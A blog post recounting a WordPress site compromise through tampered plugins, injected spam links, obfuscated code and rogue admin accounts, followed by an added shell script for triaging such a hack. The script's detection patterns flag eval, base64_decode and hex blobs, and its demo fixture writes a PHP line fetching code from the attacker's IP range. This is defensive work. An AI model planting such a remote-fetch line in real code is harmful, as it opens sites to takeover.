The Case of the Changing Blog

I rarely re-read or revisit old blog posts on this site. Generally speaking I write them, give them a quick once over, and send them on their way. The only time I look up old posts is to either verify a date or find a link to send to someone. That’s what I was doing over the weekend when I dug up a blog post from four years ago and was surprised to find spam links embedded throughout the post — links I did not put there. The game, as they say, was afoot.

Discovering your website’s been hacked in this fashion isn’t like coming home from work and discovering that someone has kicked in your front door. It’s like coming home from work, unlocking your front door, setting down your stuff, fixing a drink, sitting down in the living room… and then realizing your television is missing. And quite often it’s like realizing that the television in that back bedroom you only go into once a month is missing. At least when someone kicks in your front door, you know how they got in.

Last week WordPress notified me that one of the plugins I use had been hacked. I don’t mean someone used a vulnerability in one of my plugins to hack my website. Apparently someone compromised multiple WordPress plugins at their source, and the tampered versions were then pushed out to everyone who was using those plugins. This is one of those cases where doing the right thing and enabling auto-updates bit me.

My initial hunch, that someone had snuck the spammy links directly into my posts, turned out to be wrong. When I attempted to edit the offending posts, the spam links were nowhere to be found. Instead, they were being injected on the fly each time a post was rendered. I ultimately found a large chunk of obfuscated code hiding inside my theme’s functions.php file that seemed to be doing the dirty work.

I still haven’t put all the pieces together, but best I can tell here’s what happened.

– POWERPRESS PODCASTING PLUGIN BY BLUBRRY: Last week I received a notification from WordPress that this plugin (also known as “PowerPress”) had been compromised. (The plugin has since been updated.)

– HEAD, FOOTER, AND POST INJECTION PLUGIN: I don’t know if this is related, but around the same time this plugin appeared on all my WordPress sites, already enabled. I only noticed it because it broke the header of most of my WordPress sites. The “post injection” portion of the plugin contained a bunch of obfuscated code. That seems sus. (The plugin has since been removed.)

– ADMIN ACCOUNTS CREATED: I discovered four new admin accounts on all my WordPress sites. All of them had randomly generated names that were eight characters long and email domains of example.com. (Accounts were all removed.)

– MORE SUSPICIOUS PLUGINS DISCOVERED: I discovered two more plugins that were new to me, “Code Functionality” and another named simply after my domain (“RobOHara.com”). One linked back to my functions.php file, which had been compromised and contained a very large section of hex-obfuscated code. I removed all the offending code.

I think that’s everything I found. Because my old WordPress theme was out of date and no longer being supported, I’ve changed to a new one. I don’t love the new one and I’m sure I’ll be tweaking it a bit, but it’s modern and up to date, so there’s that. I’ve also installed a couple of WordPress plugins that scan for code changes so I won’t be caught quite so blind-sided next time.

EDIT:

I found someone else, Terence Eden on Mastodon, who experienced the exact same hack. One of the remediations he suggested was grepping all the PHP files on your site for the IP address of the attacker. Here was the exact command he suggested:

grep -r --include="*.php" "94\.156\.79"

Leveraging that, I found multiple other malicious plugins that had been installed on my websites, including:

/wp-content/plugins/custom-mail-smtp-checker/custom-mail-smtp-checker.php
/wp-content/plugins/informative/testplugingodlike.php

Between removing those, the original ones, and removing all the newly created admin accounts, I think (hope) I have this one squashed.
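The hunt described above was done by hand: grep every PHP file for the attacker’s IP, spot the hex-obfuscated blob in functions.php, notice plugins that were never installed on purpose, and find what changed recently. The script below is an added example that automates those four checks; it is not the post author’s code or Terence Eden’s. It assumes a POSIX shell with a grep that supports -r, -E and --include (GNU or BSD) plus find, and takes the WordPress root as its argument. The IP prefix 94.156.79 is the one quoted above; the sample site tree it builds for the demo is constructed here and is not real malware.

```shell
#!/bin/sh
# Added triage script for the kind of compromise described in the post (not the
# post author's or Terence Eden's code). Assumes POSIX sh, grep with -r/-E/--include,
# and find. The attacker IP prefix is the one quoted in the post; the fixture
# tree below is constructed for the demo.
set -u

IP_PATTERN='94\.156\.79'   # a prefix, so any 94.156.79.x host matches

# 1. Every PHP file under $1 that references the attacker IP prefix.
scan_ip() {
    grep -rl --include='*.php' "$IP_PATTERN" "$1" 2>/dev/null | sort
}

# 2. PHP files carrying common obfuscation tells: a run of 8+ \xNN escapes
#    (the hex-obfuscated payload found in functions.php), eval(, or
#    base64_decode(. Legitimate plugins can trip this, so review hits by hand.
scan_obfuscation() {
    grep -rlE --include='*.php' \
        '(\\x[0-9a-fA-F]{2}){8,}|(^|[^A-Za-z0-9_])eval[[:space:]]*\(|base64_decode[[:space:]]*\(' \
        "$1" 2>/dev/null | sort
}

# 3. Plugin directory names, so ones you never installed ("informative",
#    "custom-mail-smtp-checker") stand out against the list you recognise.
list_plugins() {
    for d in "$1"/wp-content/plugins/*/; do
        [ -d "$d" ] && basename "$d"
    done
}

# 4. PHP files modified in the last N days (default 14): a dropper has to
#    write somewhere, and a rewritten functions.php shows up here.
recent_php() {
    find "$1" -name '*.php' -mtime "-${2:-14}" | sort
}

# Constructed sample tree standing in for a compromised site: one benign plugin,
# one dropped plugin that calls home to the attacker's range, and a theme
# functions.php carrying a hex-escaped string. Nothing here is executable malware.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/plugins/hello-dolly" \
             "$root/wp-content/plugins/informative" \
             "$root/wp-content/themes/demo"
    printf '<?php\n// benign plugin\nfunction demo_hello() { return "hi"; }\n' \
        > "$root/wp-content/plugins/hello-dolly/hello.php"
    printf '<?php\n// constructed: dropped plugin fetching instructions from the attacker range\n$c = file_get_contents("http://94.156.79.1/x.php");\n' \
        > "$root/wp-content/plugins/informative/testplugingodlike.php"
    printf '<?php\n// constructed: hex-escaped string, the tell the post describes\n$p = "\\x65\\x76\\x61\\x6c\\x28\\x62\\x61\\x73\\x65";\n' \
        > "$root/wp-content/themes/demo/functions.php"
    echo "$root"
}

# Run all four checks against a WordPress root and print a report.
report() {
    echo "== files referencing $IP_PATTERN";           scan_ip "$1"
    echo "== files with obfuscation indicators";        scan_obfuscation "$1"
    echo "== installed plugins";                        list_plugins "$1"
    echo "== PHP files modified in the last 14 days";   recent_php "$1" 14
    # Admin accounts live in the database, not on disk. With WP-CLI installed:
    #   wp user list --role=administrator --fields=ID,user_login,user_email,user_registered
}

# Usage: sh wp-triage.sh /var/www/html   (no argument: run against the constructed fixture)
report "${1:-$(make_fixture)}"
```

Run it against the real document root rather than a copy, and treat every hit in the first two sections as something to open and read, not something to delete blindly: the obfuscation regex will also match some legitimate minified or encoded plugin code. The WP-CLI line in the comment is the on-disk equivalent of the admin-account check; the rogue accounts with example.com addresses are in the database, so grep alone will not find them.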
